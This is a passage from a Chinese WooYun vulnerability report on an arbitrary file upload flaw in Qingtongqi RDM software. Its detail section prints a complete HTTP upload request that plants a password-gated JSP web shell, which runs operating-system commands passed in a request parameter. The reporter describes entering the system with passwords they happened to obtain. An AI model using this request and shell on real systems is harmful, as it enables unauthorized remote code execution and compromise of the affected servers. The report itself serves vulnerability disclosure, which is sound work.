青铜器RDM任意上传getshell

2017年4月21日20:20:38评论485 views字数 234阅读0分46秒阅读模式

摘要

2016-04-07：细节已通知厂商并且等待厂商处理中
2016-04-11：厂商已经确认，细节仅向厂商公开
2016-04-21：细节向核心白帽子及相关领域专家公开
2016-05-01：细节向普通白帽子公开
2016-05-11：细节向实习白帽子公开
2016-05-26：细节向公众公开

漏洞概要关注数(10) 关注此漏洞

缺陷编号： WooYun-2016-193295

漏洞标题：青铜器RDM任意上传getshell

漏洞作者： wooutl

提交时间： 2016-04-07 12:50

公开时间： 2016-05-26 11:20

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

青铜器RDM任意上传getshell

详细说明：

头两天很偶然得到几个密码进到rdm系统转了转

找了个下载看看位置

解了看看

上传了看看

本地提交看看

一句话看看

code 区域

"http://**.**.**.**/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000&"& HTTP/1.1
 Accept: text/*
 Content-Type: multipart/form-data; boundary=----------KM7Ij5234ei4GI3Ef1cH2ei4ei4e
 User-Agent: Shockwave Flash
 Host: **.**.**.**
 Content-Length: 893
 Proxy-Connection: Keep-Alive
 Pragma: no-cache
 Cookie: _ga=GA1.2.1259806175.1459557490; _jzqa=1.1299702211058405000.1459557490.1459573115.1459585791.4; Hm_lvt_6d141314e7cea7d4950e6b57c4d67420=1459557490; sgsa_id=**.**.**.**|1459557516975289; _jzqx=1.1459573115.1459573115.1.jzqsr=**.**.**.**|jzqct=/forum%2Ephp.-; username=%u5F2%sdfe; userpassword=; JSESSIONID=708109C330E9D9C86F1D09814A180CFB
 
 ------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
 Content-Disposition: form-data; name="Filename"
 
 1.jsp
 ------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
 Content-Disposition: form-data; name="folder"
 
 /pages/common/
 ------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
 Content-Disposition: form-data; name="Filedata"; filename="§1.jsp§"
 Content-Type: application/octet-stream
 
 <%
     if("_pass".equals(request.getParameter("pwd"))){
         **.**.**.**.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
         int a = -1;
         byte[] b = new byte[2048];
         out.print("<pre>");
         while((a=in.read(b))!=-1){
             out.println(new String(b));
         }
         out.print("</pre>");
     }
 %>
 
 ------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
 Content-Disposition: form-data; name="Upload"
 
 Submit Query
 ------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6--

漏洞证明：

修复方案：

客户端加强算法或服务端预处理，需验证客户端信息、referer等

版权声明：转载请注明来源 wooutl@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2016-04-11 11:13

厂商回复：

CNVD未直接复现所述情况，暂未建立与网站管理单位的直接处置渠道，待认领。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(10) 关注此漏洞

缺陷编号： WooYun-2016-193295

漏洞标题： 青铜器RDM任意上传getshell

相关厂商： 青铜器RDM

漏洞作者： wooutl

提交时间： 2016-04-07 12:50

公开时间： 2016-05-26 11:20

漏洞类型： 文件上传导致任意代码执行

危害等级： 高

自评Rank： 20

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wooutl@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(10) 关注此漏洞

漏洞标题：青铜器RDM任意上传getshell

相关厂商：青铜器RDM

漏洞类型：文件上传导致任意代码执行

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分